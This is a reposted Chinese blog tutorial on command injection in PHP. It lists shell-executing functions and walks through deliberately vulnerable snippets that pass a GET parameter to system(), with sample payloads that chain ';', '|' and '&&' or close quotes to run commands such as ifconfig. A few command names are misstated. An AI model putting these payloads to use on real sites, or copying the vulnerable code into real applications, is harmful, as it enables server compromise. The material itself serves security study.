我是靠谱客的博主 舒心信封,最近开发中收集的这篇文章主要介绍命令执行漏洞学习,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

命令注入

命令注入的危害与web中间件的运行权限有关,由于web应用运行在web中间件上,所有web应用会“继承”web中间件的运行权限。黑客可以利用漏洞任意执行权限允许的命令,比如:查看系统敏感信息,添加管理员,反弹shell(就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端,本质上是网络概念的客户端的角色反转),下载并运行恶意代码等,一旦中间件权限分配过大,黑客将直接控制我们的web服务器

本质
系统把用户输入的参数当成了要执行的命令,并且这些命令被执行了。

产生原因:
web网站没有对用户提价的参数进行有效的检测过滤
操作系统允许一条语句执行多条命令(连接符和管道符)

php可以用下列5个函数来执行外部的应用程序或函数
system(),exec(),passthru(),shell_exec()以及反引号``

system(args) 有回显
passthru(args)(有回显)
exec(args) (回显最后一行-必须echo输出)
shell_exec(args) (无回显-必须输出)
反引号:``
popen(handle,mode)(无回显)
proc_open(‘cmd’,‘flag’,‘flag’)(无回显)
$ process = proc_open(‘dir’,$ des,$ pipes);
echo stream_get_contents($ pipes[1]);

补充一些前置知识点(可以随用随查的)

  • web操作系统命令
    ping 检测网络连通性
    ipconfig 查看当前ip地址
    netstat 查看网络端口及其链接情况
    net user 查看,增加,删除当前系统用户
    net localgroup 查看,增加,删除当前系统用户组
    dir 列出当前目录下的文件和子目录信息
    req 注册表及其相关操作
    systeminfo 查看当前计算机的综合信息
    tasklist 显示当前运行的进程信息
  • linux操作系统命令
    ipconfig 查看当前ip,mac等信息
    netstart 查看网络端口及连接情况
    whoami 查看当前用户
    cat 查看当前文件内容
    ls 查看当前目录下的文件和子目录信息
    useradd 添加用户
    userdel 删除用户
    passwd 修改用户密码

system()函数漏洞利用1

<?php
$arg = $_GET[‘cmd’];
if($arg){
system($arg);
}
?>

/?cmd=id
/?cmd=pwd
/?cmd=ifconfig

system()函数漏洞利用2

<?php
$arg = $_GET[‘cmd’];
if($arg){
system(“ping –c 3 $arg);
}
?>

我们能够控制的点是程序的整个参数,我们可以直接用&&或|等等,利用与、或、管道命令来执行其他命令。
• /?cmd=127.0.0.1| ifconfig

System(“ping –c 3 127.0.0.1; ifconfig)
linux 下支持分号 ”;”
|,||,%26,%26%26,
中间加任意字符,后面都会执行-,//,/*/

system()函数漏洞利用3

关键掌握:
逻辑与短路
+ 短路与&&的特点,前面如果为真,才执行后面的,如果为假,都不执行。
+ 逻辑与&的特点,前面无论真假,后面都执行
+ 短路或||&的特点,前面如果为真,后面的不执行了,前面为假,后面执行
+ 逻辑或|前面无论真假,后面都执行
<?php
$arg = $_GET[‘cmd’];
if($arg){
system(“ls –al “$arg””);
// ls –al “”;ifconfig;”
}
?>

• /?cmd=/home” ; ifconfig;”
• /?cmd=/home” | ifconfig;”
• /?cmd=/home” %26 ifconfig;”
• /?cmd=/home” %26%26 ifconfig;”

system()函数漏洞利用4

<?php
$arg = $_GET[‘cmd’];
if($arg){
system(“ls –al ‘$arg’”);
}
?>

在单引号内的话,变量不能被解析,因此要想执行命令必须闭合单引号。
• /cmd?=/home ‘|ipconfig’

system()函数漏洞利用5
当过滤掉像flag这样的关键字的时候可用反引号进行命令替换

最后

以上就是舒心信封为你收集整理的命令执行漏洞学习的全部内容,希望文章能够帮你解决命令执行漏洞学习所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(57)

评论列表共有 0 条评论

立即
投稿
返回
顶部